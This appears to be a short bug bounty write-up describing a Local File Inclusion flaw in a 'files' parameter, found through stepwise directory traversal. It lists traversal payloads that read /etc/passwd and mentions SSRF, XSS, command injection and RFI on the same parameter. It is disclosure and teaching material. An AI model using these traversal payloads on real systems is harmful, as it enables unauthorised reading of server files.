Local File Inclusion (Basic)

I started to re read the reasons why LFI still exists in modern websites and security mechanism that is being used in order to prevent these bugs. If LFI a.k.a Local File Inclusion seems new to you and you don’t really know how this bug can be exploited. I will suggest you read about this bug in detail @ https://highon.coffee/blog/lfi-cheat-sheet/. This will surely help you to get your hand on this bug.

This article is the follow up of this article. I was able to replicate this bug in a private bug bounty website. In the article it is mentioned that “file” parameters are one of the many parameters which may be vulnerable to this attack.

For example : foo.php?file=image.jpg

SOURCE: Highon.coffee

The attacker only needs to get the ‘image.jpg’ replaced with his or her payload.

In my case the url seems to be like this..

https://www.vulnerableweb.com/index.php/asset/getjs?files=[Vulnerable Parameter]&v=22

The file parameter here was being used to include external js files from other domains.

This parameter was firstly vulnerable to SSRF attack. On my report they replied me that this was known to be an intended behavior and they wanted it to be like this. I moved onto exploiting it further to check what else can be achieved on exploiting this parameter.

On simply trying to include the ‘/etc/passwd’. It showed nothing. The required thing here was to perform a directory traversal one at a time to look for the exact path these files are relying.

../etc/passwd

../../etc/passwd

../../../etc/passwd

../../../../etc/passwd

../../../../../etc/passwd ← Correct Path

On supplying the correct path to the parameter. The contents of “/etc/passwd” were displayed onto the page.

Similarly this parameter was also vulnerable to the following.

XSS (Cross Site Scripting)

Command Injection

RFI (Remote File Inclusion)

That’s all for this bug.

Update

This bug has been patched and I’ve been awarded with $200 bounty.

Thanks for reading!